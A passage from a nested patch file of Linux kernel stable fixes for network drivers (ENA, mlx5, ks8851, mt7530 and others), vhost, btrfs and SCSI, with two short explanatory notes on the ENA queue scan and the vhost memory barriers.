+-		   MT753X_BPDU_CPU_ONLY);
++	mt7530_rmw(priv, MT753X_RGAC2,
++		   MT753X_R0E_BPDU_FR | MT753X_R0E_EG_TAG_MASK |
++			   MT753X_R0E_PORT_FW_MASK | MT753X_R03_BPDU_FR |
++			   MT753X_R03_EG_TAG_MASK | MT753X_R03_PORT_FW_MASK,
++		   MT753X_R0E_BPDU_FR |
++			   MT753X_R0E_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_R0E_PORT_FW(MT753X_BPDU_CPU_ONLY) |
++			   MT753X_R03_BPDU_FR |
++			   MT753X_R03_EG_TAG(MT7530_VLAN_EG_UNTAGGED) |
++			   MT753X_BPDU_CPU_ONLY);
+ }
+ 
+ static int
+diff --git a/drivers/net/dsa/mt7530.h b/drivers/net/dsa/mt7530.h
+index fa2afa67ceb07..2d1ea390f05ab 100644
+--- a/drivers/net/dsa/mt7530.h
++++ b/drivers/net/dsa/mt7530.h
+@@ -63,6 +63,7 @@ enum mt753x_id {
+ 
+ /* Registers for BPDU and PAE frame control */
+ #define MT753X_BPC			0x24
++#define  MT753X_PAE_BPDU_FR		BIT(25)
+ #define  MT753X_PAE_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_PAE_EG_TAG(x)		FIELD_PREP(MT753X_PAE_EG_TAG_MASK, x)
+ #define  MT753X_PAE_PORT_FW_MASK	GENMASK(18, 16)
+@@ -73,20 +74,24 @@ enum mt753x_id {
+ 
+ /* Register for :01 and :02 MAC DA frame control */
+ #define MT753X_RGAC1			0x28
++#define  MT753X_R02_BPDU_FR		BIT(25)
+ #define  MT753X_R02_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_R02_EG_TAG(x)		FIELD_PREP(MT753X_R02_EG_TAG_MASK, x)
+ #define  MT753X_R02_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R02_PORT_FW(x)		FIELD_PREP(MT753X_R02_PORT_FW_MASK, x)
++#define  MT753X_R01_BPDU_FR		BIT(9)
+ #define  MT753X_R01_EG_TAG_MASK		GENMASK(8, 6)
+ #define  MT753X_R01_EG_TAG(x)		FIELD_PREP(MT753X_R01_EG_TAG_MASK, x)
+ #define  MT753X_R01_PORT_FW_MASK	GENMASK(2, 0)
+ 
+ /* Register for :03 and :0E MAC DA frame control */
+ #define MT753X_RGAC2			0x2c
++#define  MT753X_R0E_BPDU_FR		BIT(25)
+ #define  MT753X_R0E_EG_TAG_MASK		GENMASK(24, 22)
+ #define  MT753X_R0E_EG_TAG(x)		FIELD_PREP(MT753X_R0E_EG_TAG_MASK, x)
+ #define  MT753X_R0E_PORT_FW_MASK	GENMASK(18, 16)
+ #define  MT753X_R0E_PORT_FW(x)		FIELD_PREP(MT753X_R0E_PORT_FW_MASK, x)
++#define  MT753X_R03_BPDU_FR		BIT(9)
+ #define  MT753X_R03_EG_TAG_MASK		GENMASK(8, 6)
+ #define  MT753X_R03_EG_TAG(x)		FIELD_PREP(MT753X_R03_EG_TAG_MASK, x)
+ #define  MT753X_R03_PORT_FW_MASK	GENMASK(2, 0)
+diff --git a/drivers/net/ethernet/amazon/ena/ena_com.c b/drivers/net/ethernet/amazon/ena/ena_com.c
+index 633b321d7fdd9..4db689372980e 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_com.c
++++ b/drivers/net/ethernet/amazon/ena/ena_com.c
+@@ -362,7 +362,7 @@ static int ena_com_init_io_sq(struct ena_com_dev *ena_dev,
+ 			ENA_COM_BOUNCE_BUFFER_CNTRL_CNT;
+ 		io_sq->bounce_buf_ctrl.next_to_use = 0;
+ 
+-		size = io_sq->bounce_buf_ctrl.buffer_size *
++		size = (size_t)io_sq->bounce_buf_ctrl.buffer_size *
+ 			io_sq->bounce_buf_ctrl.buffers_num;
+ 
+ 		dev_node = dev_to_node(ena_dev->dmadev);
+diff --git a/drivers/net/ethernet/amazon/ena/ena_netdev.c b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+index 9e82e7b9c3b72..5e37b18ac3adf 100644
+--- a/drivers/net/ethernet/amazon/ena/ena_netdev.c
++++ b/drivers/net/ethernet/amazon/ena/ena_netdev.c
+@@ -1203,8 +1203,11 @@ static void ena_unmap_tx_buff(struct ena_ring *tx_ring,
+ static void ena_free_tx_bufs(struct ena_ring *tx_ring)
+ {
+ 	bool print_once = true;
++	bool is_xdp_ring;
+ 	u32 i;
+ 
++	is_xdp_ring = ENA_IS_XDP_INDEX(tx_ring->adapter, tx_ring->qid);
++
+ 	for (i = 0; i < tx_ring->ring_size; i++) {
+ 		struct ena_tx_buffer *tx_info = &tx_ring->tx_buffer_info[i];
+ 
+@@ -1224,10 +1227,15 @@ static void ena_free_tx_bufs(struct ena_ring *tx_ring)
+ 
+ 		ena_unmap_tx_buff(tx_ring, tx_info);
+ 
+-		dev_kfree_skb_any(tx_info->skb);
++		if (is_xdp_ring)
++			xdp_return_frame(tx_info->xdpf);
++		else
++			dev_kfree_skb_any(tx_info->skb);
+ 	}
+-	netdev_tx_reset_queue(netdev_get_tx_queue(tx_ring->netdev,
+-						  tx_ring->qid));
++
++	if (!is_xdp_ring)
++		netdev_tx_reset_queue(netdev_get_tx_queue(tx_ring->netdev,
++							  tx_ring->qid));
+ }
+ 
+ static void ena_free_all_tx_bufs(struct ena_adapter *adapter)
+@@ -3797,10 +3805,11 @@ static void check_for_missing_completions(struct ena_adapter *adapter)
+ {
+ 	struct ena_ring *tx_ring;
+ 	struct ena_ring *rx_ring;
+-	int i, budget, rc;
++	int qid, budget, rc;
+ 	int io_queue_count;
+ 
+ 	io_queue_count = adapter->xdp_num_queues + adapter->num_io_queues;
++
+ 	/* Make sure the driver doesn't turn the device in other process */
+ 	smp_rmb();
+ 
+@@ -3813,27 +3822,29 @@ static void check_for_missing_completions(struct ena_adapter *adapter)
+ 	if (adapter->missing_tx_completion_to == ENA_HW_HINTS_NO_TIMEOUT)
+ 		return;
+ 
+-	budget = ENA_MONITORED_TX_QUEUES;
++	budget = min_t(u32, io_queue_count, ENA_MONITORED_TX_QUEUES);
+ 
+-	for (i = adapter->last_monitored_tx_qid; i < io_queue_count; i++) {
+-		tx_ring = &adapter->tx_ring[i];
+-		rx_ring = &adapter->rx_ring[i];
++	qid = adapter->last_monitored_tx_qid;
++
++	while (budget) {
++		qid = (qid + 1) % io_queue_count;
++
++		tx_ring = &adapter->tx_ring[qid];
++		rx_ring = &adapter->rx_ring[qid];
+ 
+ 		rc = check_missing_comp_in_tx_queue(adapter, tx_ring);
+ 		if (unlikely(rc))
+ 			return;
+ 
+-		rc =  !ENA_IS_XDP_INDEX(adapter, i) ?
++		rc =  !ENA_IS_XDP_INDEX(adapter, qid) ?
+ 			check_for_rx_interrupt_queue(adapter, rx_ring) : 0;
+ 		if (unlikely(rc))
+ 			return;
+ 
+ 		budget--;
+-		if (!budget)
+-			break;
+ 	}
+ 
+-	adapter->last_monitored_tx_qid = i % io_queue_count;
++	adapter->last_monitored_tx_qid = qid;
+ }
+ 
+ /* trigger napi schedule after 2 consecutive detections */
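The check_for_missing_completions() rework above turns a scan that always restarted near the array tail into a true round robin: resume from the last visited queue, wrap with a modulo, and cap each pass with a budget no larger than the queue count. A generic sketch of that shape (scan_one() and its return convention are hypothetical, not the ena driver's API):

#include <linux/minmax.h>

/* Visit at most `budget` queues per pass, resuming where the last
 * pass stopped; on error, bail without advancing the saved position.
 */
static void scan_round_robin(int *last_qid, int queue_count, int budget,
			     int (*scan_one)(int qid))
{
	int qid = *last_qid;

	budget = min_t(int, budget, queue_count);

	while (budget--) {
		qid = (qid + 1) % queue_count;
		if (scan_one(qid))
			return;
	}

	*last_qid = qid;
}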
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index f810b5dc25f01..0d0aad7141c15 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -10564,6 +10564,8 @@ static int __bnxt_open_nic(struct bnxt *bp, bool irq_re_init, bool link_re_init)
+ 	/* VF-reps may need to be re-opened after the PF is re-opened */
+ 	if (BNXT_PF(bp))
+ 		bnxt_vf_reps_open(bp);
++	if (bp->ptp_cfg)
++		atomic_set(&bp->ptp_cfg->tx_avail, BNXT_MAX_TX_TS);
+ 	bnxt_ptp_init_rtc(bp, true);
+ 	bnxt_ptp_cfg_tstamp_filters(bp);
+ 	return 0;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index bb99302eab67a..67080d5053e07 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -4237,18 +4237,18 @@ static int rvu_nix_block_init(struct rvu *rvu, struct nix_hw *nix_hw)
+ 		 */
+ 		rvu_write64(rvu, blkaddr, NIX_AF_CFG,
+ 			    rvu_read64(rvu, blkaddr, NIX_AF_CFG) | 0x40ULL);
++	}
+ 
+-		/* Set chan/link to backpressure TL3 instead of TL2 */
+-		rvu_write64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL, 0x01);
++	/* Set chan/link to backpressure TL3 instead of TL2 */
++	rvu_write64(rvu, blkaddr, NIX_AF_PSE_CHANNEL_LEVEL, 0x01);
+ 
+-		/* Disable SQ manager's sticky mode operation (set TM6 = 0)
+-		 * This sticky mode is known to cause SQ stalls when multiple
+-		 * SQs are mapped to same SMQ and transmitting pkts at a time.
+-		 */
+-		cfg = rvu_read64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS);
+-		cfg &= ~BIT_ULL(15);
+-		rvu_write64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS, cfg);
+-	}
++	/* Disable SQ manager's sticky mode operation (set TM6 = 0)
++	 * This sticky mode is known to cause SQ stalls when multiple
++	 * SQs are mapped to same SMQ and transmitting pkts at a time.
++	 */
++	cfg = rvu_read64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS);
++	cfg &= ~BIT_ULL(15);
++	rvu_write64(rvu, blkaddr, NIX_AF_SQM_DBG_CTL_STATUS, cfg);
+ 
+ 	ltdefs = rvu->kpu.lt_def;
+ 	/* Calibrate X2P bus to check if CGX/LBK links are fine */
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c b/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
+index 2842195ee548a..1e887d640cffc 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/qos.c
+@@ -82,24 +82,25 @@ int mlx5e_open_qos_sq(struct mlx5e_priv *priv, struct mlx5e_channels *chs,
+ 
+ 	txq_ix = mlx5e_qid_from_qos(chs, node_qid);
+ 
+-	WARN_ON(node_qid > priv->htb_max_qos_sqs);
+-	if (node_qid == priv->htb_max_qos_sqs) {
+-		struct mlx5e_sq_stats *stats, **stats_list = NULL;
+-
+-		if (priv->htb_max_qos_sqs == 0) {
+-			stats_list = kvcalloc(mlx5e_qos_max_leaf_nodes(priv->mdev),
+-					      sizeof(*stats_list),
+-					      GFP_KERNEL);
+-			if (!stats_list)
+-				return -ENOMEM;
+-		}
++	WARN_ON(node_qid >= mlx5e_htb_cur_leaf_nodes(priv->htb));
++	if (!priv->htb_qos_sq_stats) {
++		struct mlx5e_sq_stats **stats_list;
++
++		stats_list = kvcalloc(mlx5e_qos_max_leaf_nodes(priv->mdev),
++				      sizeof(*stats_list), GFP_KERNEL);
++		if (!stats_list)
++			return -ENOMEM;
++
++		WRITE_ONCE(priv->htb_qos_sq_stats, stats_list);
++	}
++
++	if (!priv->htb_qos_sq_stats[node_qid]) {
++		struct mlx5e_sq_stats *stats;
++
+ 		stats = kzalloc(sizeof(*stats), GFP_KERNEL);
+-		if (!stats) {
+-			kvfree(stats_list);
++		if (!stats)
+ 			return -ENOMEM;
+-		}
+-		if (stats_list)
+-			WRITE_ONCE(priv->htb_qos_sq_stats, stats_list);
++
+ 		WRITE_ONCE(priv->htb_qos_sq_stats[node_qid], stats);
+ 		/* Order htb_max_qos_sqs increment after writing the array pointer.
+ 		 * Pairs with smp_load_acquire in en_stats.c.
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c b/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
+index f675b1926340f..f66bbc8464645 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/selq.c
+@@ -57,6 +57,7 @@ int mlx5e_selq_init(struct mlx5e_selq *selq, struct mutex *state_lock)
+ 
+ void mlx5e_selq_cleanup(struct mlx5e_selq *selq)
+ {
++	mutex_lock(selq->state_lock);
+ 	WARN_ON_ONCE(selq->is_prepared);
+ 
+ 	kvfree(selq->standby);
+@@ -67,6 +68,7 @@ void mlx5e_selq_cleanup(struct mlx5e_selq *selq)
+ 
+ 	kvfree(selq->standby);
+ 	selq->standby = NULL;
++	mutex_unlock(selq->state_lock);
+ }
+ 
+ void mlx5e_selq_prepare_params(struct mlx5e_selq *selq, struct mlx5e_params *params)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 9910a0480f589..e7d396434da36 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -5578,9 +5578,7 @@ void mlx5e_priv_cleanup(struct mlx5e_priv *priv)
+ 	kfree(priv->tx_rates);
+ 	kfree(priv->txq2sq);
+ 	destroy_workqueue(priv->wq);
+-	mutex_lock(&priv->state_lock);
+ 	mlx5e_selq_cleanup(&priv->selq);
+-	mutex_unlock(&priv->state_lock);
+ 	free_cpumask_var(priv->scratchpad.cpumask);
+ 
+ 	for (i = 0; i < priv->htb_max_qos_sqs; i++)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+index e6674118bc428..164e10b5f9b7f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+@@ -1752,8 +1752,9 @@ static struct mlx5_flow_handle *add_rule_fg(struct mlx5_flow_group *fg,
+ 	}
+ 	trace_mlx5_fs_set_fte(fte, false);
+ 
++	/* Link newly added rules into the tree. */
+ 	for (i = 0; i < handle->num_rules; i++) {
+-		if (refcount_read(&handle->rule[i]->node.refcount) == 1) {
++		if (!handle->rule[i]->node.parent) {
+ 			tree_add_node(&handle->rule[i]->node, &fte->node);
+ 			trace_mlx5_fs_add_rule(handle->rule[i]);
+ 		}
+diff --git a/drivers/net/ethernet/micrel/ks8851.h b/drivers/net/ethernet/micrel/ks8851.h
+index e5ec0a363aff8..31f75b4a67fd7 100644
+--- a/drivers/net/ethernet/micrel/ks8851.h
++++ b/drivers/net/ethernet/micrel/ks8851.h
+@@ -368,7 +368,6 @@ union ks8851_tx_hdr {
+  * @rdfifo: FIFO read callback
+  * @wrfifo: FIFO write callback
+  * @start_xmit: start_xmit() implementation callback
+- * @rx_skb: rx_skb() implementation callback
+  * @flush_tx_work: flush_tx_work() implementation callback
+  *
+  * The @statelock is used to protect information in the structure which may
+@@ -423,8 +422,6 @@ struct ks8851_net {
+ 					  struct sk_buff *txp, bool irq);
+ 	netdev_tx_t		(*start_xmit)(struct sk_buff *skb,
+ 					      struct net_device *dev);
+-	void			(*rx_skb)(struct ks8851_net *ks,
+-					  struct sk_buff *skb);
+ 	void			(*flush_tx_work)(struct ks8851_net *ks);
+ };
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_common.c b/drivers/net/ethernet/micrel/ks8851_common.c
+index 0bf13b38b8f5b..d4cdf3d4f5525 100644
+--- a/drivers/net/ethernet/micrel/ks8851_common.c
++++ b/drivers/net/ethernet/micrel/ks8851_common.c
+@@ -231,16 +231,6 @@ static void ks8851_dbg_dumpkkt(struct ks8851_net *ks, u8 *rxpkt)
+ 		   rxpkt[12], rxpkt[13], rxpkt[14], rxpkt[15]);
+ }
+ 
+-/**
+- * ks8851_rx_skb - receive skbuff
+- * @ks: The device state.
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	ks->rx_skb(ks, skb);
+-}
+-
+ /**
+  * ks8851_rx_pkts - receive packets from the host
+  * @ks: The device information.
+@@ -309,7 +299,7 @@ static void ks8851_rx_pkts(struct ks8851_net *ks)
+ 					ks8851_dbg_dumpkkt(ks, rxpkt);
+ 
+ 				skb->protocol = eth_type_trans(skb, ks->netdev);
+-				ks8851_rx_skb(ks, skb);
++				__netif_rx(skb);
+ 
+ 				ks->netdev->stats.rx_packets++;
+ 				ks->netdev->stats.rx_bytes += rxlen;
+@@ -340,6 +330,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	unsigned long flags;
+ 	unsigned int status;
+ 
++	local_bh_disable();
++
+ 	ks8851_lock(ks, &flags);
+ 
+ 	status = ks8851_rdreg16(ks, KS_ISR);
+@@ -416,6 +408,8 @@ static irqreturn_t ks8851_irq(int irq, void *_ks)
+ 	if (status & IRQ_LCI)
+ 		mii_check_link(&ks->mii);
+ 
++	local_bh_enable();
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/net/ethernet/micrel/ks8851_par.c b/drivers/net/ethernet/micrel/ks8851_par.c
+index 7f49042484bdc..96fb0ffcedb90 100644
+--- a/drivers/net/ethernet/micrel/ks8851_par.c
++++ b/drivers/net/ethernet/micrel/ks8851_par.c
+@@ -210,16 +210,6 @@ static void ks8851_wrfifo_par(struct ks8851_net *ks, struct sk_buff *txp,
+ 	iowrite16_rep(ksp->hw_addr, txp->data, len / 2);
+ }
+ 
+-/**
+- * ks8851_rx_skb_par - receive skbuff
+- * @ks: The device state.
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb_par(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	netif_rx(skb);
+-}
+-
+ static unsigned int ks8851_rdreg16_par_txqcr(struct ks8851_net *ks)
+ {
+ 	return ks8851_rdreg16_par(ks, KS_TXQCR);
+@@ -298,7 +288,6 @@ static int ks8851_probe_par(struct platform_device *pdev)
+ 	ks->rdfifo = ks8851_rdfifo_par;
+ 	ks->wrfifo = ks8851_wrfifo_par;
+ 	ks->start_xmit = ks8851_start_xmit_par;
+-	ks->rx_skb = ks8851_rx_skb_par;
+ 
+ #define STD_IRQ (IRQ_LCI |	/* Link Change */	\
+ 		 IRQ_RXI |	/* RX done */		\
+diff --git a/drivers/net/ethernet/micrel/ks8851_spi.c b/drivers/net/ethernet/micrel/ks8851_spi.c
+index 88e26c120b483..4dcbff789b19d 100644
+--- a/drivers/net/ethernet/micrel/ks8851_spi.c
++++ b/drivers/net/ethernet/micrel/ks8851_spi.c
+@@ -298,16 +298,6 @@ static unsigned int calc_txlen(unsigned int len)
+ 	return ALIGN(len + 4, 4);
+ }
+ 
+-/**
+- * ks8851_rx_skb_spi - receive skbuff
+- * @ks: The device state
+- * @skb: The skbuff
+- */
+-static void ks8851_rx_skb_spi(struct ks8851_net *ks, struct sk_buff *skb)
+-{
+-	netif_rx(skb);
+-}
+-
+ /**
+  * ks8851_tx_work - process tx packet(s)
+  * @work: The work structure that was scheduled.
+@@ -435,7 +425,6 @@ static int ks8851_probe_spi(struct spi_device *spi)
+ 	ks->rdfifo = ks8851_rdfifo_spi;
+ 	ks->wrfifo = ks8851_wrfifo_spi;
+ 	ks->start_xmit = ks8851_start_xmit_spi;
+-	ks->rx_skb = ks8851_rx_skb_spi;
+ 	ks->flush_tx_work = ks8851_flush_tx_work_spi;
+ 
+ #define STD_IRQ (IRQ_LCI |	/* Link Change */	\
+diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_port.c b/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
+index 32709d21ab2f9..212bf6f4ed72d 100644
+--- a/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
++++ b/drivers/net/ethernet/microchip/sparx5/sparx5_port.c
+@@ -730,7 +730,7 @@ static int sparx5_port_pcs_low_set(struct sparx5 *sparx5,
+ 	bool sgmii = false, inband_aneg = false;
+ 	int err;
+ 
+-	if (port->conf.inband) {
++	if (conf->inband) {
+ 		if (conf->portmode == PHY_INTERFACE_MODE_SGMII ||
+ 		    conf->portmode == PHY_INTERFACE_MODE_QSGMII)
+ 			inband_aneg = true; /* Cisco-SGMII in-band-aneg */
+@@ -947,7 +947,7 @@ int sparx5_port_pcs_set(struct sparx5 *sparx5,
+ 	if (err)
+ 		return -EINVAL;
+ 
+-	if (port->conf.inband) {
++	if (conf->inband) {
+ 		/* Enable/disable 1G counters in ASM */
+ 		spx5_rmw(ASM_PORT_CFG_CSC_STAT_DIS_SET(high_speed_dev),
+ 			 ASM_PORT_CFG_CSC_STAT_DIS,
+diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c
+index 3f8da6f0b25ce..488ca1c854962 100644
+--- a/drivers/net/geneve.c
++++ b/drivers/net/geneve.c
+@@ -930,7 +930,7 @@ static int geneve_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!pskb_inet_may_pull(skb))
++	if (!skb_vlan_inet_prepare(skb))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+@@ -1028,7 +1028,7 @@ static int geneve6_xmit_skb(struct sk_buff *skb, struct net_device *dev,
+ 	__be16 sport;
+ 	int err;
+ 
+-	if (!pskb_inet_may_pull(skb))
++	if (!skb_vlan_inet_prepare(skb))
+ 		return -EINVAL;
+ 
+ 	sport = udp_flow_src_port(geneve->net, skb, 1, USHRT_MAX, true);
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 450a8578157cb..2116f5ee36e20 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1715,7 +1715,7 @@ static int hisi_sas_debug_I_T_nexus_reset(struct domain_device *device)
+ 	if (dev_is_sata(device)) {
+ 		struct ata_link *link = &device->sata_dev.ap->link;
+ 
+-		rc = ata_wait_after_reset(link, HISI_SAS_WAIT_PHYUP_TIMEOUT,
++		rc = ata_wait_after_reset(link, jiffies + HISI_SAS_WAIT_PHYUP_TIMEOUT,
+ 					  smp_ata_check_ready_type);
+ 	} else {
+ 		msleep(2000);
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 7aee4d093969a..969008071decd 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -1058,7 +1058,7 @@ qla_edif_app_getstats(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 
+ 		list_for_each_entry_safe(fcport, tf, &vha->vp_fcports, list) {
+ 			if (fcport->edif.enable) {
+-				if (pcnt > app_req.num_ports)
++				if (pcnt >= app_req.num_ports)
+ 					break;
+ 
+ 				app_reply->elem[pcnt].rekey_count =
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 61c72e62abd49..1b00ed5ef1cfa 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2523,9 +2523,19 @@ bool vhost_vq_avail_empty(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+ 	r = vhost_get_avail_idx(vq, &avail_idx);
+ 	if (unlikely(r))
+ 		return false;
++
+ 	vq->avail_idx = vhost16_to_cpu(vq, avail_idx);
++	if (vq->avail_idx != vq->last_avail_idx) {
++		/* Since we have updated avail_idx, the following
++		 * call to vhost_get_vq_desc() will read available
++		 * ring entries. Make sure that read happens after
++		 * the avail_idx read.
++		 */
++		smp_rmb();
++		return false;
++	}
+ 
+-	return vq->avail_idx == vq->last_avail_idx;
++	return true;
+ }
+ EXPORT_SYMBOL_GPL(vhost_vq_avail_empty);
+ 
+@@ -2562,9 +2572,19 @@ bool vhost_enable_notify(struct vhost_dev *dev, struct vhost_virtqueue *vq)
+ 		       &vq->avail->idx, r);
+ 		return false;
+ 	}
++
+ 	vq->avail_idx = vhost16_to_cpu(vq, avail_idx);
++	if (vq->avail_idx != vq->last_avail_idx) {
++		/* Since we have updated avail_idx, the following
++		 * call to vhost_get_vq_desc() will read available
++		 * ring entries. Make sure that read happens after
++		 * the avail_idx read.
++		 */
++		smp_rmb();
++		return true;
++	}
+ 
+-	return vq->avail_idx != vq->last_avail_idx;
++	return false;
+ }
+ EXPORT_SYMBOL_GPL(vhost_enable_notify);
+ 
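Both vhost hunks above apply the same ordering rule: once the consumer observes that the producer's index has moved, it must order that load before any subsequent loads of ring entries, pairing with the producer's write barrier. A stripped-down sketch of the consumer side, with a hypothetical single-producer/single-consumer ring (not vhost's actual structures):

struct ring {
	u16 prod_idx;	/* published by the producer after filling a slot */
	u16 cons_idx;	/* private to the consumer */
};

static bool ring_has_work(struct ring *r)
{
	u16 prod = READ_ONCE(r->prod_idx);

	if (prod == r->cons_idx)
		return false;

	/* Order the index load before later loads of the ring slots;
	 * pairs with the producer's smp_wmb() between filling a slot
	 * and publishing the new index.
	 */
	smp_rmb();
	return true;
}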
+diff --git a/fs/btrfs/delayed-inode.c b/fs/btrfs/delayed-inode.c
+index c6426080cf0ad..1494ce990d298 100644
+--- a/fs/btrfs/delayed-inode.c
++++ b/fs/btrfs/delayed-inode.c
+@@ -1115,6 +1115,9 @@ __btrfs_commit_inode_delayed_items(struct btrfs_trans_handle *trans,
+ 	if (ret)
+ 		return ret;
+ 
++	ret = btrfs_record_root_in_trans(trans, node->root);
++	if (ret)
++		return ret;
+ 	ret = btrfs_update_delayed_inode(trans, node->root, path, node);
+ 	return ret;
+ }
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index c14d4f70e84bd..80ca7b435b0d1 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -4154,6 +4154,8 @@ void btrfs_qgroup_convert_reserved_meta(struct btrfs_root *root, int num_bytes)
+ 				      BTRFS_QGROUP_RSV_META_PREALLOC);
+ 	trace_qgroup_meta_convert(root, num_bytes);
+ 	qgroup_convert_meta(fs_info, root->root_key.objectid, num_bytes);
++	if (!sb_rdonly(fs_info->sb))
++		add_root_meta_rsv(root, num_bytes, BTRFS_QGROUP_RSV_META_PERTRANS);
+ }
+ 
+ /*
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index b172091f42612..5549c843f0d3f 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -700,14 +700,6 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		h->reloc_reserved = reloc_reserved;
+ 	}
+ 
+-	/*
+-	 * Now that we have found a transaction to be a part of, convert the
+-	 * qgroup reservation from prealloc to pertrans. A different transaction
+-	 * can't race in and free our pertrans out from under us.
+-	 */
+-	if (qgroup_reserved)
+-		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
+-
+ got_it:
+ 	if (!current->journal_info)
+ 		current->journal_info = h;
+@@ -741,8 +733,15 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		 * not just freed.
+ 		 */
+ 		btrfs_end_transaction(h);
+-		return ERR_PTR(ret);
++		goto reserve_fail;
+ 	}
++	/*
++	 * Now that we have found a transaction to be a part of, convert the
++	 * qgroup reservation from prealloc to pertrans. A different transaction
++	 * can't race in and free our pertrans out from under us.
++	 */
++	if (qgroup_reserved)
++		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
+ 
+ 	return h;
+ 
+diff --git a/fs/smb/client/cached_dir.c b/fs/smb/client/cached_dir.c
+index f4ad343b06c1f..2ca1881919c7b 100644
+--- a/fs/smb/client/cached_dir.c
++++ b/fs/smb/client/cached_dir.c
+@@ -386,8 +386,8 @@ smb2_close_cached_fid(struct kref *ref)
+ 	if (cfid->is_open) {
+ 		rc = SMB2_close(0, cfid->tcon, cfid->fid.persistent_fid,
+ 			   cfid->fid.volatile_fid);
+-		if (rc != -EBUSY && rc != -EAGAIN)
+-			atomic_dec(&cfid->tcon->num_remote_opens);
++		if (rc) /* should we retry on -EBUSY or -EAGAIN? */
++			cifs_dbg(VFS, "close cached dir rc %d\n", rc);
+ 	}
+ 
+ 	free_cached_dir(cfid);
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index b79097b9070b3..5d6a5f3097cd0 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -659,4 +659,11 @@ static inline bool dma_fence_is_container(struct dma_fence *fence)
+ 	return dma_fence_is_array(fence) || dma_fence_is_chain(fence);
+ }
+ 
++#define DMA_FENCE_WARN(f, fmt, args...) \
++	do {								\
++		struct dma_fence *__ff = (f);				\
++		pr_warn("f %llu#%llu: " fmt, __ff->context, __ff->seqno,\
++			 ##args);					\
++	} while (0)
++
+ #endif /* __LINUX_DMA_FENCE_H */
+diff --git a/include/linux/irqflags.h b/include/linux/irqflags.h
+index 2b665c32f5fe6..2e09c269bf9d8 100644
+--- a/include/linux/irqflags.h
++++ b/include/linux/irqflags.h
+@@ -126,7 +126,7 @@ do {						\
+ # define lockdep_softirq_enter()		do { } while (0)
+ # define lockdep_softirq_exit()			do { } while (0)
